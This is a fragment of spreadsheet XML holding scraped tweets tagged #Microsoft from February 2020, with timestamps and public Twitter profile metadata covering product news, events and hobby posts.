    <t>Amrita School of Business Coimbatore campus #alumnus Mr. Gangadhar Kodandaram, MBA 2006 is currently the Director-sales in #Microsoft. Here's him with @satyanadella, #CEO of Microsoft during his recent visit to India. Congratulations Gangadhar! Best wishes. 
#asb #business #mba https://t.co/Bzo8DHuMlm</t>
  </si>
  <si>
    <t>{'id': 152933590, 'id_str': '152933590', 'name': 'Amrita Vishwa Vidyapeetham', 'screen_name': 'AMRITAedu', 'location': '', 'description': "One of India's leading research and teaching universities, started by the world-renowned humanitarian leader, Sri Mata Amritanandamayi Devi, Amma.", 'url': 'https://t.co/nKxde4w9wL', 'entities': {'url': {'urls': [{'url': 'https://t.co/nKxde4w9wL', 'expanded_url': 'http://amrita.edu', 'display_url': 'amrita.edu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3051, 'friends_count': 81, 'listed_count': 33, 'created_at': 'Mon Jun 07 07:18:48 +0000 2010', 'favourites_count': 982, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3667,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'http://pbs.twimg.com/profile_images/959577940584415232/_jBMt9Xv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959577940584415232/_jBMt9Xv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/152933590/1568396738',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</si>
  <si>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07:47:14 +0000 2020</t>
  </si>
  <si>
    <t>Update Rollup 1 for SC DPM 2019 brings new features! https://t.co/l9ndD1ELA4 #Microsoft</t>
  </si>
  <si>
    <t>Quick Solutions to Customer Pain Points in Excel https://t.co/9ckW7BftKX #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 07:43:27 +0000 2020</t>
  </si>
  <si>
    <t>One week from today @mirkocolemberg will be on stage at #IgniteTheTour in #Zurich and give a speech about "Responding to incidents" and one about "Building the foundation for modern ops: Monitoring".
Don't miss it. 
#baseVISION #Microsoft  #Security #Microsoft365 #M365 #Intune</t>
  </si>
  <si>
    <t>Thu Feb 27 07:41:44 +0000 2020</t>
  </si>
  <si>
    <t>Attention all #datascience folks, Women in Data Science,a #Stanford Initiative is going to organize conference right here in #Noida.
Leverage this opportunity to listen to speakers from #Microsoft,#IBM,#Gartner,#Adobe on March 28th and 29th.
Early bird...https://t.co/Jx3kDYT7UQ</t>
  </si>
  <si>
    <t>{'id': 2148312943, 'id_str': '2148312943', 'name': 'Ganesh Samarthyam', 'screen_name': 'GSamarthyam', 'location': 'Bengaluru, India', 'description': "CoFounder, CodeOps Technologies &amp; KonfHub; CoAuthor 'Refactoring for Design Smells'; @CodeOpsTech @KonfHub; CoOrganizer Namma Cloud Conference: https://t.co/aEJvWYh6HE", 'url': 'https://t.co/YzoLZfJbFZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YzoLZfJbFZ', 'expanded_url': 'http://www.konfhub.com', 'display_url': 'konfhub.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/aEJvWYh6HE', 'expanded_url': 'http://ncc.konfhub.com', 'display_url': 'ncc.konfhub.com', 'indices': [144, 167]}]}}, 'protected': False, 'followers_count': 1535, 'friends_count': 5000, 'listed_count': 112, 'created_at': 'Tue Oct 22 04:17:19 +0000 2013', 'favourites_count': 3275, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6284, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/771291018939424768/atOlXKJw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771291018939424768/atOlXKJw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2148312943/1581581973', 'profile_link_color': '1B95E0',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</si>
  <si>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07:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the #Microsoft #DevOps Community  2019.11.22 | Azure DevOps Blog https://t.co/HpeodVy81u #TechJunkieBlog https://t.co/kDjX1I2XU2</t>
  </si>
  <si>
    <t>Thu Feb 27 07:36:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns for weaker quarterly sales for Windows OEM, Surface due to coronavirus https://t.co/DRpFJh4ZB6</t>
  </si>
  <si>
    <t>Thu Feb 27 07:36:47 +0000 2020</t>
  </si>
  <si>
    <t>Reached the conclusion I'm not gonna buy a next gen console.
#gaming #gamer #nextgen #nextgeneration #nextgenconsoles #PCGaming #PCGAMER #Nerd #Geek #tech #technology #sony #Microsoft #xbox #playstation #XboxSeriesX #PS5 #Xbox</t>
  </si>
  <si>
    <t>{'id': 3436472063, 'id_str': '3436472063', 'name': 'Jay Schneider', 'screen_name': 'jdschnei12', 'location': 'Concord, CA', 'description': 'Just a gamer that likes to make others laugh', 'url': 'https://t.co/xRs2tCAwvB', 'entities': {'url': {'urls': [{'url': 'https://t.co/xRs2tCAwvB', 'expanded_url': 'https://www.youtube.com/user/MANiACmiget925', 'display_url': 'youtube.com/user/MANiACmigâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 152, 'listed_count': 0, 'created_at': 'Sun Aug 23 08:39:10 +0000 2015', 'favourites_count': 4956, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 592,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'http://pbs.twimg.com/profile_images/1125559994911379456/9s8DD3pN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125559994911379456/9s8DD3pN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3436472063/1557189388',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</si>
  <si>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07:32:51 +0000 2020</t>
  </si>
  <si>
    <t>#AWS announced that you can now join your #Amazon #RDS for #SQL Server DB instances deployed across multiple AWS accounts and Amazon #VPCs to a single AWS Directory Service for Microsoft Active Directory (AWS Managed #Microsoft AD) within an AWS Region.
 https://t.co/BJHWWG7alK</t>
  </si>
  <si>
    <t>{'id': 1174190550, 'id_str': '1174190550', 'name': 'Nico BÃ¤umer', 'screen_name': 'nbaeumer', 'location': '', 'description': 'I work for @AWSCloud &amp; my opinions are my own', 'url': 'https://t.co/UHO8e9MC1s', 'entities': {'url': {'urls': [{'url': 'https://t.co/UHO8e9MC1s', 'expanded_url': 'https://www.facebook.com/nico.baeumer', 'display_url': 'facebook.com/nico.baeumer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 141, 'listed_count': 1, 'created_at': 'Wed Feb 13 07:14:39 +0000 2013', 'favourites_count': 119, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1356,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'http://pbs.twimg.com/profile_images/959488688672579584/DDaRoB-B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959488688672579584/DDaRoB-B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1174190550/1466101737',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</si>
  <si>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07:32:27 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon drops massive deals on #Microsoft Surface Go, Pro 6, and Book 2 laptops - https://t.co/zX6QMYy1kx #Technology</t>
  </si>
  <si>
    <t>{'id': 119744625, 'id_str': '119744625', 'name': 'Syed Shahzad Alam', 'screen_name': 'syedshahzadalam', 'location': 'Karachi, Pakistan', 'description': 'News Music Sports Technology', 'url': 'https://t.co/4l9j8uKnj4', 'entities': {'url': {'urls': [{'url': 'https://t.co/4l9j8uKnj4', 'expanded_url': 'https://www.youtube.com/channel/UCSo9RMBkZTiqm9Vmj1VwhKQ', 'display_url': 'youtube.com/channel/UCSo9Râ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5021, 'friends_count': 4302, 'listed_count': 37, 'created_at': 'Thu Mar 04 14:27:24 +0000 2010', 'favourites_count': 255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 23753,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'http://pbs.twimg.com/profile_images/954681392314699776/csgcwBCu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/954681392314699776/csgcwBCu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/119744625/1492060642', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '11A2EB', 'profile_sidebar_fill_color': '82C2E0', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 07:28:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft store and app's images have issues</t>
  </si>
  <si>
    <t>Thu Feb 27 07:21:44 +0000 2020</t>
  </si>
  <si>
    <t>How to embed content from other websites in SharePoint Online -  #SharePoint #Office365 #Microsoft   https://t.co/jlLr6bu76n</t>
  </si>
  <si>
    <t>Thu Feb 27 07:21:20 +0000 2020</t>
  </si>
  <si>
    <t>Report: Google wants to work with Huawei, applies for the license #Microsoft #Google https://t.co/sehJUsRpxu</t>
  </si>
  <si>
    <t>{'id': 1874798778, 'id_str': '1874798778', 'name': 'The Hans India', 'screen_name': 'TheHansIndiaWeb', 'location': 'Hyderabad', 'description': 'The Hans India is a leading English news paper and is published from #Telangana #AndhraPradesh and #NewDelhi', 'url': 'https://t.co/lyOzm0wKU9', 'entities': {'url': {'urls': [{'url': 'https://t.co/lyOzm0wKU9', 'expanded_url': 'https://www.thehansindia.com', 'display_url': 'thehansindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4674, 'friends_count': 1632, 'listed_count': 275, 'created_at': 'Tue Sep 17 09:26:43 +0000 2013', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 190618,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'http://pbs.twimg.com/profile_images/1193259214480773128/FVfjPYIu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193259214480773128/FVfjPYIu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1874798778/1577298390', 'profile_link_color': '981CEB',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</si>
  <si>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Feb 27 07:16:12 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/pQHOMM3mOV</t>
  </si>
  <si>
    <t>Thu Feb 27 07:14:37 +0000 2020</t>
  </si>
  <si>
    <t>How to #set up #Docker within Windows System for #Linux (WSL2) on Windows 10 https://t.co/fCvJu7V8We #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 07:14:13 +0000 2020</t>
  </si>
  <si>
    <t>See a phone call from crazy ex, slam the lid to cut them off. 
#Microsoft
#SurfaceDuo
#TechNave https://t.co/21KybvfPdI</t>
  </si>
  <si>
    <t>Thu Feb 27 07:04:54 +0000 2020</t>
  </si>
  <si>
    <t>Die #Microsoft Mobile App: 10 Highlights- Microsoft Tech Community - 889419 https://t.co/czcjtMZaOX</t>
  </si>
  <si>
    <t>{'id': 239953180, 'id_str': '239953180', 'name': 'Thomas AnschÃ¼tz', 'screen_name': 'tanschuetz', 'location': 'Neustadt an der WeinstraÃŸe', 'description': 'Notes Migration Evangelist', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 258, 'listed_count': 18, 'created_at': 'Tue Jan 18 20:37:42 +0000 2011', 'favourites_count': 729, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1237,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'http://pbs.twimg.com/profile_images/1077906244642525184/AehlRkdt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077906244642525184/AehlRkdt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/239953180/1420222539', 'profile_link_color': '466969',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</si>
  <si>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Feb 27 07:01:25 +0000 2020</t>
  </si>
  <si>
    <t>Deploy different business applications into their own dedicated subscription. https://t.co/ufozQ5Kd7H
#Azure #AzureFamily #AzureSecurity #Cloud #CloudComputing #Blog #Design #Architecture #CloudSpendings #AzureSubsecription #Microsoft #Cloud https://t.co/Qx9xdrsdZd</t>
  </si>
  <si>
    <t>Thu Feb 27 07:00:11 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@dynamiccrmcat @donasarkar @ch9 Love it!!! Will share and cannot wait to watch it!
But. Wait. I am not with MSFT anymore. 
What's the best way to access it outside #Microsoft? Shall I just... #bingit? </t>
  </si>
  <si>
    <t>Thu Feb 27 06:57:59 +0000 2020</t>
  </si>
  <si>
    <t>We are happy to announce the next confirmed speaker @vanhybrid. Michael  is a #MCSM and Office Apps &amp;amp; Services #MVP.
#WPNinjaS #modernWorkplace #speakers #sharingknowledge #microsoft #tech #MVPBuzz #Cloud #IdentityManagement #IndependentSolutionArchitect #microsoft365 #security https://t.co/ijybMiirs4</t>
  </si>
  <si>
    <t>Thu Feb 27 06:57:45 +0000 2020</t>
  </si>
  <si>
    <t>#Dubai Silicon Oasis Authority signs a Memorandum of Understanding (MoU) with #Microsoft to help startups implement the highest technology https://t.co/bgBdM9pir4</t>
  </si>
  <si>
    <t>{'id': 710442737347203072, 'id_str': '710442737347203072', 'name': 'Biznet Consulting', 'screen_name': 'BizNetAE', 'location': 'Dubai, United Arab Emirates', 'description': 'We are a Management Consulting firm specializing in Government Relations, Project Management, Project Development Consultancy and Company Formation.', 'url': 'https://t.co/uNPkG5F1Ip', 'entities': {'url': {'urls': [{'url': 'https://t.co/uNPkG5F1Ip', 'expanded_url': 'https://www.biznet-consulting.com', 'display_url': 'biznet-consulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 575, 'friends_count': 55, 'listed_count': 47, 'created_at': 'Thu Mar 17 12:28:42 +0000 2016', 'favourites_count': 324, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1466, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214503980270792706/hESLqfCD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214503980270792706/hESLqfCD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/710442737347203072/1582452362',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</si>
  <si>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06:56:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure Sentinel Insecure Protocols Workbook Implementation Guide https://t.co/Cwjcl01Qs9 #Azure #AzureSentinel #Security #Cloud #AzOps #SecOps #Protocols https://t.co/xF1AsSmvcZ</t>
  </si>
  <si>
    <t>Thu Feb 27 06:52:36 +0000 2020</t>
  </si>
  <si>
    <t>Its kicking off again in Sydney #microsoft with the Sydney D365UG!  Fantastic line up.
#d365ugsydney #powerplatform #businessapplications https://t.co/QfRyplbHDY</t>
  </si>
  <si>
    <t>{'id': 837148117770252288, 'id_str': '837148117770252288', 'name': 'Andrew Ly', 'screen_name': '365lyf', 'location': 'Adelaide, South Australia', 'description': 'Dynamics 365 | Business Apps MVP | 3D Modeller | Mixed Reality | Amateur Motorsports | Dad', 'url': 'https://t.co/pSeky6KTyn', 'entities': {'url': {'urls': [{'url': 'https://t.co/pSeky6KTyn', 'expanded_url': 'http://www.365lyf.com', 'display_url': '365lyf.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 932, 'friends_count': 1329, 'listed_count': 20, 'created_at': 'Thu Mar 02 03:50:39 +0000 2017', 'favourites_count': 486, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 503, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1079329654597545984/-OmKAl_J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079329654597545984/-OmKAl_J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/837148117770252288/1509146922',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</si>
  <si>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06:51:30 +0000 2020</t>
  </si>
  <si>
    <t>It isn't much, but just got my first Microsoft Certification, Microsoft 365 Fundamentals, next step, MCSA! #mcsa #microsoft #certification</t>
  </si>
  <si>
    <t>{'id': 1041666522, 'id_str': '1041666522', 'name': 'Lucas', 'screen_name': 'Savatte', 'location': "ÉÄ±×ŸÉÉ¹Ê‡snÉ 'ÇuÉqsÄ±É¹q", 'description': 'Lucas, mi-chat, mi-ordinateur, et re mi-chat derriÃ¨re. Tech Support McGyver. ðŸ‡¦ðŸ‡º/ðŸ‡«ðŸ‡·', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 499, 'friends_count': 132, 'listed_count': 52, 'created_at': 'Fri Dec 28 08:28:35 +0000 2012', 'favourites_count': 533, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 75443,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'http://pbs.twimg.com/profile_images/1212905111397093376/xDPabBaz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212905111397093376/xDPabBaz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041666522/1577395833', 'profile_link_color': 'FB8521',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</si>
  <si>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Feb 27 06:51:01 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. 
https://t.co/udnjMLOFXO</t>
  </si>
  <si>
    <t>{'id': 53661946, 'id_str': '53661946', 'name': 'Martin Aldewereld', 'screen_name': 'aldewereld', 'location': 'The Hague, Netherlands', 'description': 'Happy with my three girls, Caroline, Fleur and Lisa | Microsoft Dynamics 365 | Sparta Rotterdam | KPMG\nViews expressed are my own', 'url': 'http://t.co/b71R1RUDV2', 'entities': {'url': {'urls': [{'url': 'http://t.co/b71R1RUDV2', 'expanded_url': 'http://aldewereld.wordpress.com', 'display_url': 'aldewereld.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 603, 'friends_count': 1225, 'listed_count': 69, 'created_at': 'Sat Jul 04 12:49:06 +0000 2009', 'favourites_count': 3136, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6821,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'http://pbs.twimg.com/profile_images/836860222723469314/AYOdFEd5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/836860222723469314/AYOdFEd5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/53661946/1488357251',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</si>
  <si>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Feb 27 06:49:49 +0000 2020</t>
  </si>
  <si>
    <t>Earlier this week I had gotten 2 Xbox 360's fixed. Both previously had disc read errors and needed a laser replacement.
I don't really take too many behind the scene images but swipe to see the mess of workspace.
#dragonsdrawer #microsoft #xbox #repair #gameconsole 
1/2 https://t.co/Liz6dVYa5t</t>
  </si>
  <si>
    <t>{'id': 1224462501770866689, 'id_str': '1224462501770866689', 'name': "Dragon's Drawer", 'screen_name': 'DragonsDrawer', 'location': '', 'description': 'We fix consoles!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Feb 03 22:40:39 +0000 2020', 'favourites_count': 0,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</si>
  <si>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Feb 27 06:49:47 +0000 2020</t>
  </si>
  <si>
    <t>"Creating a Simple Windows Forms (#WinForms) Control #DLL using Visual Basic (VB)"
https://t.co/EwOQT4DwUs
#visualstudio #visualbasic #opensource #github #programming #microsoft #thursdaymorning #libraries</t>
  </si>
  <si>
    <t>{'id': 197656958, 'id_str': '197656958', 'name': 'Aswini S', 'screen_name': 'ashumeow', 'location': 'Somewhere else still in Earth', 'description': "A Geek who isn't nerdy but an introvert who is workaholic &amp; rarely, a gamer. Loves to scribble, break &amp; code! Music made her love Signals. Books are her buddies", 'url': 'http://t.co/gOQAvIRtWt', 'entities': {'url': {'urls': [{'url': 'http://t.co/gOQAvIRtWt', 'expanded_url': 'http://www.windowsgeekpro.in', 'display_url': 'windowsgeekpro.in', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6349, 'friends_count': 4, 'listed_count': 110, 'created_at': 'Sat Oct 02 02:53:04 +0000 2010', 'favourites_count': 5242, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39218, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D1CAD0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/447828615338549248/qCMt0tXw_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/447828615338549248/qCMt0tXw_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/197656958/1398214191', 'profile_link_color': '990000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 06:48:56 +0000 2020</t>
  </si>
  <si>
    <t>@brunoborges just do whatever the #Microsoft policy on this is.
My impression from another recent scandal involving a Microsoft employee is that you are getting quite aggressive in pursuing this kind of social- / market- signaling.
Looking forward to seeing how this escalates.</t>
  </si>
  <si>
    <t>{'id': 41073403, 'id_str': '41073403', 'name': 'Emilian Bold ðŸ‘¨ðŸ»\u200dðŸ’»â˜•ðŸ“®', 'screen_name': 'emilianbold', 'location': 'Europe', 'description': 'â¤ï¸ #ZFS @Java @NetBeans (I make @OpenBeans) #BSD #Linux. #Remote #work. #Tarkovsky', 'url': 'https://t.co/ZFaw9TVLAZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZFaw9TVLAZ', 'expanded_url': 'http://www.openbeans.org', 'display_url': 'openbeans.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 353, 'friends_count': 70, 'listed_count': 17, 'created_at': 'Tue May 19 07:17:53 +0000 2009', 'favourites_count': 2885, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4922,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'http://pbs.twimg.com/profile_images/1111340218945323008/39dEUKxl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111340218945323008/39dEUKxl_normal.png',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</si>
  <si>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06:48:45 +0000 2020</t>
  </si>
  <si>
    <t>Discover how well #Microsoft #Teams can perform in #Citrix from #IGELOS without optimisation/offloading - watch the video today. #endpointmanagement #bettertogether  https://t.co/G5UtG7tabD https://t.co/Su2rQfSCa9</t>
  </si>
  <si>
    <t>{'id': 1125398852750725120, 'id_str': '1125398852750725120', 'name': 'Igelize IT', 'screen_name': 'igelize', 'location': '', 'description': "ðŸ‡¨ðŸ‡­ðŸ¦” A Swiss SE at work  - it's all about passion &amp; sharing &amp; knowledge ðŸ¦”ðŸ‡¨ðŸ‡­", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Mon May 06 13:56:10 +0000 2019', 'favourites_count': 3,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'http://pbs.twimg.com/profile_images/1125399106128683008/vIkDCNtm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125399106128683008/vIkDCNtm_normal.jpg',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</si>
  <si>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Discover how well #Microsoft #Teams can perform in #Citrix from #IGELOS without optimisation/offloading - watch the video today. #endpointmanagement #bettertogether  https://t.co/UOn4gIJ6Wz https://t.co/NhHZIFiBZi</t>
  </si>
  <si>
    <t>{'id': 61750012, 'id_str': '61750012', 'name': 'Udo', 'screen_name': 'iamudoj', 'location': 'SH in CH', 'description': 'The official Twitter home of UdoJ, former Citrite, EUC Expert, CloudPro, Pre-Sales Engineer @ IGEL Technology (Schweiz) GmbH. Tweets are my own.', 'url': 'https://t.co/selEof3qOz', 'entities': {'url': {'urls': [{'url': 'https://t.co/selEof3qOz', 'expanded_url': 'https://www.igel.com', 'display_url': 'igel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 231, 'friends_count': 806, 'listed_count': 2, 'created_at': 'Fri Jul 31 11:24:06 +0000 2009', 'favourites_count': 454, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5802,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'http://pbs.twimg.com/profile_images/1037347788214947841/-F0AB-GT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1037347788214947841/-F0AB-GT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/61750012/1444835868', 'profile_link_color': 'DD2E44', 'profile_sidebar_border_color': 'A1A1A1', 'profile_sidebar_fill_color': 'E6E6E6', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 06:44:35 +0000 2020</t>
  </si>
  <si>
    <t>#Nodejs #MobileBusinessApps
Global companies like #Microsoft have adopted Node.js bcz it is a powerful #developmenttool. Our #experts can harness that power to create #apps &amp;amp; #software that will give your #business an edge against your #competition.
#nodejsapplication #nodejsdev</t>
  </si>
  <si>
    <t>{'id': 821431221611732993, 'id_str': '821431221611732993', 'name': 'Eitbiz Solutions', 'screen_name': 'eitbiz', 'location': 'Indiana, USA', 'description': 'EitBiz is a highly experienced and Multi-award winning #digitalsolutions agency in #Indianapolis, #USA. We offer a full range of #web &amp; #app #solutions', 'url': 'https://t.co/TPVasotI4i', 'entities': {'url': {'urls': [{'url': 'https://t.co/TPVasotI4i', 'expanded_url': 'https://www.eitbiz.com/', 'display_url': 'eitbiz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 252, 'listed_count': 3, 'created_at': 'Tue Jan 17 18:57:19 +0000 2017', 'favourites_count': 2862, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2963,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'http://pbs.twimg.com/profile_images/1110482751143075841/pC-0ZMmK_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110482751143075841/pC-0ZMmK_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821431221611732993/1578046037',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</si>
  <si>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06:42:14 +0000 2020</t>
  </si>
  <si>
    <t>Reliance Industries Chairman and MD Mukesh Ambani recently sat down with Microsoft CEO Satya Nadella during Microsoft's Future Decoded Event in Mumbai. They exchanged ideas about their partnership on various fronts.  #microsoft #mukeshambani #projectxclou https://t.co/8I1A6MJuYJ https://t.co/sS2Fcenu0b</t>
  </si>
  <si>
    <t>{'id': 481206444, 'id_str': '481206444', 'name': 'Karishma', 'screen_name': 'TechCafe4u', 'location': 'New Delhi / India', 'description': 'tech news, php, python coding tips\n#python #php #techcafe4u', 'url': 'http://t.co/5kpkoY9hYU', 'entities': {'url': {'urls': [{'url': 'http://t.co/5kpkoY9hYU', 'expanded_url': 'http://techcafe4u.in/', 'display_url': 'techcafe4u.in', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 16, 'listed_count': 0, 'created_at': 'Thu Feb 02 12:53:14 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 110,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'http://pbs.twimg.com/profile_images/1190563429179899904/s_kL_KjS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190563429179899904/s_kL_KjS_normal.jpg',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</si>
  <si>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06:40:04 +0000 2020</t>
  </si>
  <si>
    <t>Reliance Jio-Microsoft partnership to shape digital decade: Ambani
https://t.co/CI1uAqDwLm
#doodleblue #digitaltransformation #reliancejio #Microsoft #ambani #Digitalization #DigitalIndia #Digitalization #digitaltransformationnews #industrynews #technews #technology</t>
  </si>
  <si>
    <t>{'id': 455034452, 'id_str': '455034452', 'name': 'doodleblue', 'screen_name': 'doodleblue7', 'location': 'Chennai, India', 'description': 'We are a digital strategy consulting boutique that leads digital transformations for global brands, famous startups, fortune 500s and governments.', 'url': 'http://t.co/RpC8kzYEcg', 'entities': {'url': {'urls': [{'url': 'http://t.co/RpC8kzYEcg', 'expanded_url': 'http://www.doodleblue.com', 'display_url': 'doodleblue.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 804, 'friends_count': 1805, 'listed_count': 81, 'created_at': 'Wed Jan 04 17:21:27 +0000 2012', 'favourites_count': 236, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3293,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'http://pbs.twimg.com/profile_images/1040648029399707648/RevaZhUr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1040648029399707648/RevaZhUr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/455034452/1537273860', 'profile_link_color': '2FC2EF',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</si>
  <si>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06:38:39 +0000 2020</t>
  </si>
  <si>
